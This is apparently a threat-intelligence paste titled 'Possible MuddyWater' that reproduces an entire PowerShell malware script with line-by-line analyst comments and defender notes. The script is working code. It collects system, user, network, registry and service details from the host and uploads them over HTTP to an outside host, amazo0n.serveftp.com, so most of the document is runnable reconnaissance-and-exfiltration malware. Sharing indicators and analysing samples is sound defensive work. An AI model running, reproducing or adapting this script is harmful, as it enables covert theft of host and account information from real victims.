
2019-01-16: Possible MuddyWater

vk_intel Jan 17th, 2019 627 Never
  # Reads an identifier from %APPDATA%\ID.dat: keeps the line(s) matching "ID=",
  # splits on "=" and returns the text after the "=". There is no return path
  # when the file does not exist, so callers then get an empty value (main
  # builds the staging-file name and the upload name from it).
  # Defender note: %APPDATA%\ID.dat is the host artifact this sample depends on.
  1. function im(){$d=$env:APPDATA+"\ID.dat";if(test-path $d){$d1=Get-Content $d |Where-Object { $_ -match "ID=";};$d2=$d1 -split "=";return $d2[1];}}
  # Current local date/time in the "g" (general, short) format; the literal
  # string "Error Time" on any exception.
  2. function MyTime(){try{return Get-Date -Format g;}catch{return "Error Time";}}
  # Host name from the COMPUTERNAME environment variable; "Error ComputerName"
  # on any exception.
  3. function GetMachineName(){try{return $env:COMPUTERNAME;}catch{return "Error ComputerName";}}
  # Name of the user running the script (USERNAME env var); "Error Username"
  # on any exception.
  4. function GetUserName(){try{return $env:USERNAME;}catch{return "Error Username";}}
  # Logon domain of the current user (USERDOMAIN env var); "Error Domain name"
  # on any exception.
  5. function GetDomainName(){try{return $env:USERDOMAIN;}catch {return "Error Domain name";}}
  # Operating-system caption read through WMI (Win32_OperatingSystem.Caption);
  # "Error Os name" on any exception.
  6. function OSDetails(){try{$Name = Get-WmiObject -Class Win32_OperatingSystem;return $Name.caption;}catch {return "Error Os name";}}
  # Looks up the host's public IP by fetching https://api.ipify.org/ with a
  # WebClient configured to use the system proxy and the current user's default
  # credentials; returns the response body, or the literal "Erro Ip" (sic) on
  # any exception.
  # Defender note: in main's call order this is the first outbound request the
  # script makes, so a PowerShell-originated connection to api.ipify.org is a
  # usable early detection point, and the proxy settings mean it also lands in
  # proxy logs.
  7. function GetMyIP(){try{$wc = New-Object System.Net.WebClient;$wc.proxy = [Net.WebRequest]::GetSystemWebProxy();
  8. $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials;$readIP = $wc.DownloadString("https://api.ipify.org/");return $readIP;}catch{return "Erro Ip";}}
  # Enumerates user accounts through WMI (Win32_UserAccount); main renders the
  # objects with Out-String before adding them to the report.
  9. function g-user{return Get-WmiObject -Class Win32_UserAccount}
  # Builds a registry/service inventory and emits it as one string ($output is
  # never initialised here, so the first concatenation starts from $null).
  # Inner helper registry_values($regkey, $regvalue, $child): with $child equal
  # to "no" it reads the key itself (get-item), otherwise its subkeys
  # (get-childitem); per key it returns every property value ("all"), every
  # property name ("allname"), or just the property named $regvalue (the break
  # stops after the first one).
  # Sections collected: SMB shares (LanmanServer\Shares), system environment
  # variables (Session Manager\Environment), installed applications (the
  # DisplayName of each Uninstall subkey -- $child is omitted in that call, so
  # the subkeys are walked), Group Policy\History (labelled "Domain Name" in the
  # output) and the output of `net start` as "Running Services".
  # Defender note: this combination of HKLM reads plus `net start` from a single
  # PowerShell process is the host-side behaviour worth alerting on.
  10. function Get-Information() {[CmdletBinding()]Param ()
  11. function registry_values($regkey, $regvalue,$child){if ($child -eq "no"){$key = get-item $regkey;}
  12. else{$key = get-childitem $regkey}$key | ForEach-Object {$values = Get-ItemProperty $_.PSPath; ForEach ($value in $_.Property) { if ($regvalue -eq "all") {$values.$value}
  13. elseif ($regvalue -eq "allname"){$value} else {$values.$regvalue;break}}}}
  14. $output = $output + "`n`n Shares on the machine:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\LanmanServer\Shares" "all" "no")  -join "`r`n");
  15. $output = $output + "`n`n Environment variables:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" "all" "no")  -join "`r`n");
  16. $output = $output + "`n`n Installed Applications:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname")  -join "`r`n") ;
  17. $output = $output + "`n`n Domain Name:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\" "all" "no")  -join "`r`n") ;
  18. $output = $output + "`n`n Running Services:`n" + ((net start) -join "`r`n");$output;}
  # Address of the default system proxy via System.Net.WebProxy.GetDefaultProxy
  # (an API marked obsolete in .NET, which is presumably why it is wrapped in
  # try/catch); "error in read proxy" on any exception.
  19. function prx(){try{return ([System.Net.WebProxy]::GetDefaultProxy()).Address}catch{return "error in read proxy"}}
  # Exfiltration step: POSTs the file at $filename, with Content-Type
  # binary/octet-stream, to http://amazo0n.serveftp.com/users.php?tname=<tname>&path=Data
  # over plain HTTP, through the system proxy with the caller's default
  # credentials. Returns the server response decoded as UTF-8 and trimmed, or
  # the literal "false" on any exception. The $id parameter is never used.
  # Defender note: the hostname amazo0n.serveftp.com (apparently an "amazon"
  # look-alike on a dynamic-DNS domain) together with the
  # users.php?tname=T_<id>&path=Data query shape are this sample's network
  # indicators; because the transfer is unencrypted HTTP, the uploaded report
  # is visible to proxy and network inspection.
  20. function ufile($filename,$id,$tname){try{$url="http://amazo0n.serveftp.com/users.php?tname="+$tname+"&path=Data";$enc=[System.Text.Encoding]::UTF8;$wc = New-Object System.Net.WebClient;
  21. $wc.proxy = [Net.WebRequest]::GetSystemWebProxy();$wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials;$wc.Headers.Add("Content-Type", "binary/octet-stream");
  22. $str = $enc.GetString($wc.UploadFile($url,"POST",$filename));$str=$str.trim();return $str;}catch{return "false";}}
  # Orchestrates collection and upload:
  #  1. $r is the identifier from %APPDATA%\ID.dat (im); the staging file is
  #     %TEMP%\<id>.txt, so an empty $r gives %TEMP%\.txt.
  #  2. Gathers run time, computer/user/domain name, OS caption, public IP,
  #     user accounts, the registry/service inventory (Get-Information),
  #     `ipconfig /all` and the default proxy, and joins them under the labels
  #     seen in $det0 ("MachinName" is the sample's own spelling).
  #  3. Writes the report to the staging file (out-file -Encoding default
  #     -Force) and uploads it with ufile under the name "T_"+<id>.
  # The upload result ($d) is discarded and nothing removes the staging file,
  # so %TEMP%\<id>.txt stays on disk and can be recovered during response.
  23. function main(){$r=im;$f=$env:TEMP+"\"+$r+".txt";$det1=MyTime;$det2=GetMachineName;$det3=GetUserName;$det4=GetDomainName;$det5=OSDetails;$det6=GetMyIP;$det7=g-user|Out-String;$det8=Get-Information;
  24. $det9=ipconfig /all|Out-String;$det11=prx|Out-String;
  25. $det0="RunTime: "+$det1+"`nMachinName: "+$det2+"`nUserName: "+$det3+"`nDomainName: "+$det4+"`nOsName: "+$det5+"`nIP: "+$det6+"`nG-user: "+$det7+"`nG_INF: "+$det8+"`nIPCONFIG: "+$det9+"`nProxy: "+$det11;
  26. $det0 | out-file $f -Encoding default -Force;$tname="T_"+$r;$d=ufile $f $r $tname;}
  # Entry point: runs the collection and upload once when the script executes.
  27. main